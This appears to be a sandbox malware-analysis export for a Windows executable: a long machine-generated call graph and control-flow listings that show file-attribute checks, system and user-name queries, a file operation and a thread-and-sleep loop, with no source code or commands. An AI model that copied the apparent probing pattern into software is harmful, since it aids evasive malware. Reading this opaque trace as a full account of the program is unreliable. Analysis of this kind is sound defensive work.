30172 192440 26 API calls 6 library calls 30037->30172 30171 1a90e0 26 API calls 2 library calls 30038->30171 30040 1a80ba 30040->29900 30041->29900 30044 19b087 30043->30044 30044->30044 30045 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30044->30045 30046 19b0a3 30045->30046 30047->29894 30049 1ace5a 30048->30049 30050 1ace5c IsProcessorFeaturePresent 30048->30050 30049->29911 30052 1ad084 30050->30052 30173 1ad048 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30052->30173 30054 1ad167 30054->29911 30174 1c6a56 25 API calls 2 library calls 30055->30174 30057 1c6ad9 30175 1c6ae7 11 API calls CallUnexpected 30057->30175 30059 1c6ae6 30060->29945 30061->29945 30063->29942 30064->29958 30065->29959 30066->29958 30067->29963 30082 1a7de0 26 API calls 4 library calls 30068->30082 30070 19587b 30070->29966 30072 194b4e 30071->30072 30073 194b24 30071->30073 30083 1a7de0 26 API calls 4 library calls 30072->30083 30074 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30073->30074 30075 194b3b 30074->30075 30077 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30075->30077 30078 194b4a 30077->30078 30078->29968 30079 194bab 30080 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30079->30080 30081 194ce6 30080->30081 30081->29968 30082->30070 30083->30079 30165 1c3f50 30084->30165 30087 197cc8 30089 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30087->30089 30088 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30090 1981d5 30088->30090 30091 197cd7 30089->30091 30090->30018 30092 195b20 36 API calls 30091->30092 30093 197ce2 30092->30093 30094 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30093->30094 30095 197d04 30094->30095 30096 195b20 36 API calls 30095->30096 30097 197d0f GetModuleHandleA GetProcAddress 30096->30097 30099 197d35 ThreadProxyFactory 30097->30099 30100 197db6 ThreadProxyFactory 30099->30100 30103 1981dc 30099->30103 30101 197de3 GetNativeSystemInfo 30100->30101 30102 197de7 GetSystemInfo 30100->30102 30108 197ded 30101->30108 30102->30108 30104 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30103->30104 30105 1981e1 30104->30105 30106 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30105->30106 30107 1981e6 30106->30107 30109 197f29 30108->30109 30110 197e4f 30108->30110 30133 197df8 ThreadProxyFactory 30108->30133 30111 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30109->30111 30112 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30110->30112 30113 197f55 30111->30113 30114 197e70 30112->30114 30115 195b20 36 API calls 30113->30115 30116 195b20 36 API calls 30114->30116 30118 197f5c 30115->30118 30117 197e77 30116->30117 30119 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30117->30119 30120 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30118->30120 30121 197e8f 30119->30121 30122 197f74 30120->30122 30123 195b20 36 API calls 30121->30123 30124 195b20 36 API calls 30122->30124 30126 197e96 30123->30126 30125 197f7b 30124->30125 30127 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30125->30127 30167 1c89b1 40 API calls 30126->30167 30129 197fac 30127->30129 30131 195b20 36 API calls 30129->30131 30130 197ec1 30130->30105 30130->30133 30132 197fb3 30131->30132 30168 195640 26 API calls 3 library calls 30132->30168 30133->30088 30135 197fc2 30136 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30135->30136 30137 197ffd 30136->30137 30138 195b20 36 API calls 30137->30138 30139 198004 30138->30139 30140 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30139->30140 30141 19801c 30140->30141 30142 195b20 36 API calls 30141->30142 30143 198023 30142->30143 30144 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30143->30144 30145 198054 30144->30145 30146 195b20 36 API calls 30145->30146 30147 19805b 30146->30147 30169 195640 26 API calls 3 library calls 30147->30169 30149 19806a 30150 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30149->30150 30151 1980a5 30150->30151 30152 195b20 36 API calls 30151->30152 30153 1980ac 30152->30153 30154 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30153->30154 30155 1980c4 30154->30155 30156 195b20 36 API calls 30155->30156 30157 1980cb 30156->30157 30158 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30157->30158 30159 1980fc 30158->30159 30160 195b20 36 API calls 30159->30160 30161 198103 30160->30161 30170 195640 26 API calls 3 library calls 30161->30170 30163->30018 30164->30018 30166 197ca6 GetVersionExW 30165->30166 30166->30087 30166->30133 30167->30130 30168->30135 30169->30149 30170->30133 30171->30040 30172->30041 30173->30054 30174->30057 30175->30059 30176 19d5ec 30177 19d5f7 30176->30177 30178 19d61c ThreadProxyFactory 30176->30178 30177->30178 30179 19d9ba 30177->30179 30181 19d755 GetModuleFileNameA 30178->30181 30180 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30179->30180 30182 19d9bf 30180->30182 30183 19d790 30181->30183 30201 1c6617 30182->30201 30183->30183 30186 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30183->30186 30185 19d9c5 30214 1a7820 30185->30214 30192 19d7ac 30186->30192 30189 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30190 19d9f5 30189->30190 30191 1a7820 26 API calls 30190->30191 30196 19da08 30191->30196 30193 19d992 ThreadProxyFactory 30192->30193 30195 19da1b 30192->30195 30194 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30193->30194 30197 19d9b3 30194->30197 30199 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30195->30199 30196->30195 30218 1c6489 30196->30218 30200 19da20 30199->30200 30202 1c6623 __FrameHandler3::FrameUnwindToState 30201->30202 30203 1c662d 30202->30203 30204 1c6642 30202->30204 30221 1c7373 14 API calls _free 30203->30221 30205 1c663d 30204->30205 30223 1c8b52 RtlEnterCriticalSection 30204->30223 30205->30185 30208 1c6632 30222 1c6aba 25 API calls __wsopen_s 30208->30222 30210 1c665f 30224 1c65a0 65 API calls 3 library calls 30210->30224 30212 1c666a 30225 1c6691 RtlLeaveCriticalSection ___scrt_uninitialize_crt 30212->30225 30215 1a7840 30214->30215 30215->30215 30216 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30215->30216 30217 19d9da 30216->30217 30217->30189 30226 1c6327 30218->30226 30221->30208 30222->30205 30223->30210 30224->30212 30225->30205 30227 1c6335 30226->30227 30228 1c6347 30226->30228 30254 1adb27 GetModuleHandleW 30227->30254 30238 1c61ce 30228->30238 30231 1c633a 30231->30228 30255 1c63cd GetModuleHandleExW 30231->30255 30233 1c6380 30233->30195 30237 1c638a 30239 1c61da __FrameHandler3::FrameUnwindToState 30238->30239 30261 1c8bbb RtlEnterCriticalSection 30239->30261 30241 1c61e4 30262 1c623a 30241->30262 30243 1c61f1 30266 1c620f 30243->30266 30246 1c638b 30271 1ca0f2 GetPEB 30246->30271 30249 1c63ba 30252 1c63cd CallUnexpected 3 API calls 30249->30252 30250 1c639a GetPEB 30250->30249 30251 1c63aa GetCurrentProcess TerminateProcess 30250->30251 30251->30249 30253 1c63c2 ExitProcess 30252->30253 30254->30231 30256 1c63ec GetProcAddress 30255->30256 30257 1c640f 30255->30257 30260 1c6401 30256->30260 30258 1c6346 30257->30258 30259 1c6415 FreeLibrary 30257->30259 30258->30228 30259->30258 30260->30257 30261->30241 30263 1c6246 __FrameHandler3::FrameUnwindToState 30262->30263 30264 1c62a7 CallUnexpected 30263->30264 30269 1c9695 14 API calls CallUnexpected 30263->30269 30264->30243 30270 1c8c03 RtlLeaveCriticalSection 30266->30270 30268 1c61fd 30268->30233 30268->30246 30269->30264 30270->30268 30272 1ca10c 30271->30272 30273 1c6395 30271->30273 30275 1cb0b7 5 API calls _unexpected 30272->30275 30273->30249 30273->30250 30275->30273 30276 19c740 30277 19c77f 30276->30277 30278 19c797 30276->30278 30280 19c7bb 30277->30280 30281 19c7e8 SHFileOperation 30277->30281 30291 1a8c40 26 API calls 5 library calls 30277->30291 30278->30277 30290 1a8c40 26 API calls 5 library calls 30278->30290 30280->30281 30283 19c83e ThreadProxyFactory 30281->30283 30284 19c8c4 30283->30284 30285 19c89e ThreadProxyFactory 30283->30285 30288 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30284->30288 30286 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30285->30286 30287 19c8c0 30286->30287 30289 19c8c9 30288->30289 30290->30277 30291->30281 30292 1985f0 30293 1985f6 30292->30293 30299 1c6589 30293->30299 30296 198616 30297 1c6617 67 API calls 30298 198610 30297->30298 30302 1c64d2 30299->30302 30304 1c64de __FrameHandler3::FrameUnwindToState 30302->30304 30303 1c64e5 30327 1c7373 14 API calls _free 30303->30327 30304->30303 30306 1c6505 30304->30306 30308 1c650a 30306->30308 30309 1c6517 30306->30309 30307 1c64ea 30328 1c6aba 25 API calls __wsopen_s 30307->30328 30329 1c7373 14 API calls _free 30308->30329 30319 1ca6b3 30309->30319 30311 198603 30311->30296 30311->30297 30315 1c6534 30331 1c6572 RtlLeaveCriticalSection ___scrt_uninitialize_crt 30315->30331 30316 1c6527 30330 1c7373 14 API calls _free 30316->30330 30320 1ca6bf __FrameHandler3::FrameUnwindToState 30319->30320 30332 1c8bbb RtlEnterCriticalSection 30320->30332 30322 1ca6cd 30333 1ca757 30322->30333 30327->30307 30328->30311 30329->30311 30330->30311 30331->30311 30332->30322 30334 1ca77a 30333->30334 30335 1ca7d2 30334->30335 30342 1ca6da 30334->30342 30349 1c8b52 RtlEnterCriticalSection 30334->30349 30350 1c8b66 RtlLeaveCriticalSection 30334->30350 30351 1cd61f 14 API calls 3 library calls 30335->30351 30337 1ca7db 30352 1cabe5 14 API calls _free 30337->30352 30340 1ca7e4 30340->30342 30353 1cb2b1 6 API calls _unexpected 30340->30353 30346 1ca713 30342->30346 30343 1ca803 30354 1c8b52 RtlEnterCriticalSection 30343->30354 30355 1c8c03 RtlLeaveCriticalSection 30346->30355 30348 1c6520 30348->30315 30348->30316 30349->30334 30350->30334 30351->30337 30352->30340 30353->30343 30354->30342 30355->30348 30356 1a6b90 30357 1a6b9b 30356->30357 30364 19d520 30357->30364 30359 1a6baa 30385 1a4e20 64 API calls 3 library calls 30359->30385 30361 1a6baf 30362 1a6b60 CreateThread 30361->30362 30363 1a6b80 Sleep 30362->30363 30363->30363 30365 19c8d0 57 API calls 30364->30365 30366 19d56c 30365->30366 30367 1a7860 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 30366->30367 30368 19d5a1 30367->30368 30369 195b20 36 API calls 30368->30369 30370 19d5ac 30369->30370 30386 1a84e0 30370->30386 30372 19d5c8 30373 1a8080 26 API calls 30372->30373 30374 19d5dd GetModuleFileNameA 30373->30374 30376 19d790 30374->30376 30376->30376 30377 1a7f20 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 30376->30377 30378 19d7ac 30377->30378 30379 19d992 ThreadProxyFactory 30378->30379 30381 19da1b 30378->30381 30380 1ace51 Concurrency::details::ReferenceLoadLibrary 5 API calls 30379->30380 30382 19d9b3 30380->30382 30383 1c6aca Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 30381->30383 30382->30359 30384 19da20 30383->30384 30385->30361 30387 1a8540 30386->30387 30387->30387 30395 1a75c0 26 API calls 4 library calls 30387->30395 30389 1a8559 30391 1a8574 CatchIt 30389->30391 30396 192440 26 API calls 6 library calls 30389->30396 30394 1a85c9 CatchIt 30391->30394 30397 192440 26 API calls 6 library calls 30391->30397 30393 1a8611 30393->30372 30394->30372 30395->30389 30396->30391 30397->30393 30398 198622 30399 198628 GetFileAttributesA 30398->30399 30400 198626 30398->30400 30401 198634 30399->30401 30400->30399 30402 1caa43 30407 1ca819 30402->30407 30405 1caa82 30408 1ca838 30407->30408 30409 1ca84b 30408->30409 30415 1ca860 30408->30415 30427 1c7373 14 API calls _free 30409->30427 30411 1ca850 30428 1c6aba 25 API calls __wsopen_s 30411->30428 30413 1ca980 30414 1ca85b 30413->30414 30432 1c7373 14 API calls _free 30413->30432 30414->30405 30424 1d188c 30414->30424 30415->30413 30429 1d111b 37 API calls 2 library calls 30415->30429 30417 1caa31 30433 1c6aba 25 API calls __wsopen_s 30417->30433 30420 1ca9d0 30420->30413 30430 1d111b 37 API calls 2 library calls 30420->30430 30422 1ca9ee 30422->30413 30431 1d111b 37 API calls 2 library calls 30422->30431 30434 1d1251 30424->30434 30427->30411 30428->30414 30429->30420 30430->30422 30431->30413 30432->30417 30433->30414 30437 1d125d __FrameHandler3::FrameUnwindToState 30434->30437 30435 1d1264 30454 1c7373 14 API calls _free 30435->30454 30437->30435 30439 1d128f 30437->30439 30438 1d1269 30455 1c6aba 25 API calls __wsopen_s 30438->30455 30445 1d181e 30439->30445 30444 1d1273 30444->30405 30457 1c67ed 30445->30457 30450 1d1854 30452 1d12b3 30450->30452 30512 1cabe5 14 API calls _free 30450->30512 30456 1d12e6 RtlLeaveCriticalSection __wsopen_s 30452->30456 30454->30438 30455->30444 30456->30444 30513 1c676a 30457->30513 30460 1c6811 30462 1c674d 30460->30462 30525 1c669b 30462->30525 30465 1d18ac 30550 1d15fa 30465->30550 30468 1d18de 30582 1c7360 14 API calls _free 30468->30582 30469 1d18f7 30568 1cbc3b 30469->30568 30472 1d18e3 30583 1c7373 14 API calls _free 30472->30583 30474 1d191c 30581 1d1565 CreateFileW 30474->30581 30475 1d1905 30584 1c7360 14 API calls _free 30475->30584 30479 1d190a 30585 1c7373 14 API calls _free 30479->30585 30480 1d19d2 GetFileType 30483 1d19dd GetLastError 30480->30483 30484 1d1a24 30480->30484 30482 1d19a7 GetLastError 30587 1c733d 14 API calls 2 library calls 30482->30587 30588 1c733d 14 API calls 2 library calls 30483->30588 30590 1cbb86 15 API calls 3 library calls 30484->30590 30485 1d1955 30485->30480 30485->30482 30586 1d1565 CreateFileW 30485->30586 30489 1d19eb CloseHandle 30489->30472 30492 1d1a14 30489->30492 30491 1d199a 30491->30480 30491->30482 30589 1c7373 14 API calls _free 30492->30589 30493 1d1a45 30495 1d1a91 30493->30495 30591 1d1774 71 API calls 3 library calls 30493->30591 30500 1d1a98 30495->30500 30593 1d1312 71 API calls 2 library calls 30495->30593 30496 1d1a19 30496->30472 30499 1d1ac6 30499->30500 30501 1d1ad4 30499->30501 30592 1cad38 28 API calls 2 library calls 30500->30592 30502 1d18f0 30501->30502 30504 1d1b50 CloseHandle 30501->30504 30502->30450 30594 1d1565 CreateFileW 30504->30594 30506 1d1b7b 30507 1d1b85 GetLastError 30506->30507 30511 1d1a9f 30506->30511 30595 1c733d 14 API calls 2 library calls 30507->30595 30509 1d1b91 30596 1cbd4e 15 API calls 3 library calls 30509->30596 30511->30502 30512->30452 30514 1c678a 30513->30514 30520 1c6781 30513->30520 30514->30520 30522 1ca461 37 API calls 3 library calls 30514->30522 30516 1c67aa 30523 1cb3eb 37 API calls __cftof 30516->30523 30518 1c67c0 30524 1cb418 37 API calls __cftof 30518->30524 30520->30460 30521 1cb0f7 5 API calls _unexpected 30520->30521 30521->30460 30522->30516 30523->30518 30524->30520 30526 1c66a9 30525->30526 30527 1c66c3 30525->30527 30543 1c682c 14 API calls _free 30526->30543 30529 1c66e9 30527->30529 30530 1c66ca 30527->30530 30545 1cae89 MultiByteToWideChar 30529->30545 30542 1c66b3 30530->30542 30544 1c6846 15 API calls _unexpected 30530->30544 30533 1c66f8 30534 1c66ff GetLastError 30533->30534 30535 1c6725 30533->30535 30548 1c6846 15 API calls _unexpected 30533->30548 30546 1c733d 14 API calls 2 library calls 30534->30546 30535->30542 30549 1cae89 MultiByteToWideChar 30535->30549 30537 1c670b 30547 1c7373 14 API calls _free 30537->30547 30541 1c673c 30541->30534 30541->30542 30542->30450 30542->30465 30543->30542 30544->30542 30545->30533 30546->30537 30547->30542 30548->30535 30549->30541 30551 1d161b 30550->30551 30552 1d1635 30550->30552 30551->30552 30604 1c7373 14 API calls _free 30551->30604 30597 1d158a 30552->30597 30555 1d162a 30605 1c6aba 25 API calls __wsopen_s 30555->30605 30557 1d166d 30558 1d169c 30557->30558 30606 1c7373 14 API calls _free 30557->30606 30561 1d16ef 30558->30561 30608 1c9951 25 API calls 2 library calls 30558->30608 30561->30468 30561->30469 30562 1d16ea 30562->30561 30564 1d1767 30562->30564 30563 1d1691 30607 1c6aba 25 API calls __wsopen_s 30563->30607 30609 1c6ae7 11 API calls CallUnexpected 30564->30609 30567 1d1773 30569 1cbc47 __FrameHandler3::FrameUnwindToState 30568->30569 30612 1c8bbb RtlEnterCriticalSection 30569->30612 30571 1cbc95 30613 1cbd45 30571->30613 30572 1cbc4e 30572->30571 30573 1cbc73 30572->30573 30578 1cbce2 RtlEnterCriticalSection 30572->30578 30616 1cba15 15 API calls 3 library calls 30573->30616 30577 1cbc78 30577->30571 30617 1cbb63 RtlEnterCriticalSection 30577->30617 30578->30571 30579 1cbcef RtlLeaveCriticalSection 30578->30579 30579->30572 30581->30485 30582->30472 30583->30502 30584->30479 30585->30472 30586->30491 30587->30472 30588->30489 30589->30496 30590->30493 30591->30495 30592->30511 30593->30499 30594->30506 30595->30509 30596->30511 30598 1d15a2 30597->30598 30599 1d15bd 30598->30599 30610 1c7373 14 API calls _free 30598->30610 30599->30557 30601 1d15e1 30611 1c6aba 25 API calls __wsopen_s 30601->30611 30603 1d15ec 30603->30557 30604->30555 30605->30552 30606->30563 30607->30558 30608->30562 30609->30567 30610->30601 30611->30603 30612->30572 30618 1c8c03 RtlLeaveCriticalSection 30613->30618 30615 1cbcb5 30615->30474 30615->30475 30616->30577 30617->30571 30618->30615

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 19a879-19a888 SetCurrentDirectoryA 1 19a88a-19a896 0->1 2 19a8b6-19a98e call 1a7860 call 195b20 call 1a7860 call 195b20 call 1a7860 call 195b20 call 1a8180 call 1a8080 call 1a8180 call 1a8440 call 1a8080 call 1978a0 0->2 4 19a898-19a8a6 1->4 5 19a8ac-19a8b3 call 1ad4c4 1->5 83 19a9bc-19a9d4 2->83 84 19a990-19a99c 2->84 4->5 6 19abd0 call 1c6aca 4->6 5->2 12 19abd5 call 1c6aca 6->12 16 19abda-19ac46 call 1c6aca 12->16 24 19ac4c 16->24 25 19ad30-19ad36 16->25 27 19ac50-19ac64 24->27 28 19ad38-19ad44 25->28 29 19ad60-19ad7d call 1ace51 25->29 32 19ac6a-19acbc call 1a7f20 call 1c88a9 27->32 33 19ad7e call 1a8060 27->33 34 19ad56-19ad5d call 1ad4c4 28->34 35 19ad46-19ad54 28->35 55 19acbe-19acc9 32->55 56 19acd7-19ace4 call 1a8b00 32->56 41 19ad83-19ae3e call 1c6aca call 1c8956 call 1c64c0 call 1c649f * 3 call 194570 33->41 34->29 35->34 35->41 105 19ae40-19ae4b 41->105 60 19accb 55->60 61 19accd-19acd5 55->61 62 19ace9-19acf3 56->62 60->61 61->62 65 19ad1d-19ad23 62->65 66 19acf5-19ad01 62->66 65->25 72 19ad25-19ad2b 65->72 69 19ad13-19ad1a call 1ad4c4 66->69 70 19ad03-19ad11 66->70 69->65 70->41 70->69 72->27 86 19aa02-19aa1a 83->86 87 19a9d6-19a9e2 83->87 88 19a99e-19a9ac 84->88 89 19a9b2-19a9b9 call 1ad4c4 84->89 93 19aa4b-19aa69 86->93 94 19aa1c-19aa2b 86->94 91 19a9f8-19a9ff call 1ad4c4 87->91 92 19a9e4-19a9f2 87->92 88->12 88->89 89->83 91->86 92->12 92->91 101 19aa6b-19aa7a 93->101 102 19aa9a-19aabe 93->102 99 19aa2d-19aa3b 94->99 100 19aa41-19aa48 call 1ad4c4 94->100 99->12 99->100 100->93 108 19aa7c-19aa8a 101->108 109 19aa90-19aa97 call 1ad4c4 101->109 103 19aaef-19ab10 102->103 104 19aac0-19aacf 102->104 114 19ab3e-19ab59 103->114 115 19ab12-19ab1e 103->115 111 19aad1-19aadf 104->111 112 19aae5-19aaec call 1ad4c4 104->112 105->105 113 19ae4d-19ae53 105->113 108->12 108->109 109->102 111->12 111->112 112->103 121 19ae56-19ae5b 113->121 117 19ab5b-19ab6a 114->117 118 19ab86-19ab8c 114->118 122 19ab20-19ab2e 115->122 123 19ab34-19ab3b call 1ad4c4 115->123 124 19ab7c-19ab83 call 1ad4c4 117->124 125 19ab6c-19ab7a 117->125 126 19ab8e-19ab9a 118->126 127 19abb6-19abcf call 1ace51 118->127 121->121 129 19ae5d-19aede call 1c3f50 call 195440 call 195500 121->129 122->12 122->123 123->114 124->118 125->12 125->124 132 19abac-19abb3 call 1ad4c4 126->132 133 19ab9c-19abaa 126->133 146 19aee1-19aee6 129->146 132->127 133->16 133->132 146->146 147 19aee8-19af0b call 1a7f20 146->147 150 19af0d-19af1c 147->150 151 19af3c-19af78 147->151 152 19af1e-19af2c 150->152 153 19af32-19af39 call 1ad4c4 150->153 154 19af7a-19afac call 1a7f20 151->154 155 19aff7 151->155 152->153 156 19affc-19b001 call 1c6aca 152->156 153->151 164 19afd9-19aff6 call 1ace51 154->164 165 19afae-19afbd 154->165 155->156 157 19aff7 call 1a8060 155->157 167 19b010-19b080 GetUserNameA 156->167 157->156 168 19afcf-19afd6 call 1ad4c4 165->168 169 19afbf-19afcd 165->169 171 19b087-19b08c 167->171 168->164 169->156 169->168 171->171 174 19b08e-19b0e0 call 1a7f20 call 1a8370 171->174
                                                                            APIs
                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,53C1E996,00000000), ref: 0019A87C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentDirectory
                                                                            • String ID: @3P$VUUU
                                                                            • API String ID: 1611563598-3039269687
                                                                            • Opcode ID: 1afb52a1064a990ab1f42323adaaedcb1d1a3a8be748eee8349d05116d10c48d
                                                                            • Instruction ID: 43fdd973d912583b439b958ab0304c541f00cb20e487acb294ee505b60521c07
                                                                            • Opcode Fuzzy Hash: 1afb52a1064a990ab1f42323adaaedcb1d1a3a8be748eee8349d05116d10c48d
                                                                            • Instruction Fuzzy Hash: 35C20371A002089FDF18DF68DD89BEDB7B5EF49304F508198E40AA7291DB35AA84CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 178 199760-199815 call 1a7860 call 195b20 187 199817-199824 178->187 188 199846-19985c call 1ace51 178->188 189 19983c-199843 call 1ad4c4 187->189 190 199826-199834 187->190 189->188 190->189 192 19985d-19a02c call 1c6aca call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 190->192 297 19a02e-19a030 192->297 298 19a032-19a035 192->298 299 19a038-19a03e 297->299 298->299 300 19a06c-19a088 299->300 301 19a040-19a04c 299->301 304 19a08a-19a096 300->304 305 19a0b6-19a0d5 300->305 302 19a04e-19a05c 301->302 303 19a062-19a069 call 1ad4c4 301->303 302->303 306 19a7a5 call 1c6aca 302->306 303->300 308 19a098-19a0a6 304->308 309 19a0ac-19a0b3 call 1ad4c4 304->309 310 19a103-19a105 305->310 311 19a0d7-19a0e3 305->311 322 19a7c3 306->322 308->306 308->309 309->305 312 19a113-19a161 call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 310->312 313 19a107-19a10e 310->313 317 19a0f9-19a100 call 1ad4c4 311->317 318 19a0e5-19a0f3 311->318 335 19a163-19a165 312->335 336 19a167-19a16a 312->336 320 19a75b-19a786 call 1a7f20 313->320 317->310 318->306 318->317 337 19a16d-19a173 335->337 336->337 338 19a1a1-19a1bd 337->338 339 19a175-19a181 337->339 342 19a1eb-19a20a 338->342 343 19a1bf-19a1cb 338->343 340 19a183-19a191 339->340 341 19a197-19a19e call 1ad4c4 339->341 340->341 344 19a7aa 340->344 341->338 348 19a238-19a23a 342->348 349 19a20c-19a218 342->349 346 19a1cd-19a1db 343->346 347 19a1e1-19a1e8 call 1ad4c4 343->347 344->322 353 19a7aa call 1c6aca 344->353 346->344 346->347 347->342 350 19a248-19a296 call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 348->350 351 19a23c-19a243 348->351 355 19a21a-19a228 349->355 356 19a22e-19a235 call 1ad4c4 349->356 369 19a298-19a29a 350->369 370 19a29c-19a29f 350->370 351->320 353->322 355->344 355->356 356->348 371 19a2a2-19a2a8 369->371 370->371 372 19a2aa-19a2b6 371->372 373 19a2d6-19a2f2 371->373 376 19a2b8-19a2c6 372->376 377 19a2cc-19a2d3 call 1ad4c4 372->377 374 19a320-19a33f 373->374 375 19a2f4-19a300 373->375 380 19a36d-19a36f 374->380 381 19a341-19a34d 374->381 378 19a302-19a310 375->378 379 19a316-19a31d call 1ad4c4 375->379 376->377 382 19a7af call 1c6aca 376->382 377->373 378->379 378->382 379->374 389 19a37d-19a3cb call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 380->389 390 19a371-19a378 380->390 387 19a34f-19a35d 381->387 388 19a363-19a36a call 1ad4c4 381->388 391 19a7b4 call 1c6aca 382->391 387->382 387->388 388->380 409 19a3cd-19a3cf 389->409 410 19a3d1-19a3d4 389->410 390->320 398 19a7b9 call 1c6aca 391->398 402 19a7be 398->402 402->322 404 19a7be call 1c6aca 402->404 404->322 411 19a3d7-19a3dd 409->411 410->411 412 19a40b-19a427 411->412 413 19a3df-19a3eb 411->413 414 19a429-19a435 412->414 415 19a455-19a474 412->415 416 19a3ed-19a3fb 413->416 417 19a401-19a408 call 1ad4c4 413->417 418 19a44b-19a452 call 1ad4c4 414->418 419 19a437-19a445 414->419 420 19a4a2-19a4a4 415->420 421 19a476-19a482 415->421 416->391 416->417 417->412 418->415 419->391 419->418 427 19a4b2-19a500 call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 420->427 428 19a4a6-19a4ad 420->428 425 19a498-19a49f call 1ad4c4 421->425 426 19a484-19a492 421->426 425->420 426->391 426->425 441 19a502-19a504 427->441 442 19a506-19a509 427->442 428->320 443 19a50c-19a512 441->443 442->443 444 19a540-19a55c 443->444 445 19a514-19a520 443->445 448 19a58a-19a5a9 444->448 449 19a55e-19a56a 444->449 446 19a522-19a530 445->446 447 19a536-19a53d call 1ad4c4 445->447 446->398 446->447 447->444 453 19a5ab-19a5b7 448->453 454 19a5d7-19a5d9 448->454 451 19a56c-19a57a 449->451 452 19a580-19a587 call 1ad4c4 449->452 451->398 451->452 452->448 455 19a5b9-19a5c7 453->455 456 19a5cd-19a5d4 call 1ad4c4 453->456 457 19a5db-19a5e2 454->457 458 19a5e7-19a635 call 1a7860 call 195b20 call 1989a0 call 1a8080 GetFileAttributesA 454->458 455->398 455->456 456->454 457->320 473 19a63b-19a63e 458->473 474 19a637-19a639 458->474 475 19a641-19a647 473->475 474->475 476 19a649-19a655 475->476 477 19a675-19a691 475->477 478 19a66b-19a672 call 1ad4c4 476->478 479 19a657-19a665 476->479 480 19a6bf-19a6de 477->480 481 19a693-19a69f 477->481 478->477 479->402 479->478 485 19a70c-19a70e 480->485 486 19a6e0-19a6ec 480->486 483 19a6a1-19a6af 481->483 484 19a6b5-19a6bc call 1ad4c4 481->484 483->402 483->484 484->480 487 19a719-19a721 call 197c40 485->487 488 19a710-19a717 485->488 491 19a6ee-19a6fc 486->491 492 19a702-19a709 call 1ad4c4 486->492 498 19a723-19a72b call 197c40 487->498 499 19a754-19a756 487->499 488->320 491->402 491->492 492->485 498->499 502 19a72d-19a735 call 197c40 498->502 499->320 502->499 505 19a737-19a73f call 197c40 502->505 505->499 508 19a741-19a749 call 197c40 505->508 508->499 511 19a74b-19a752 508->511 511->320
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
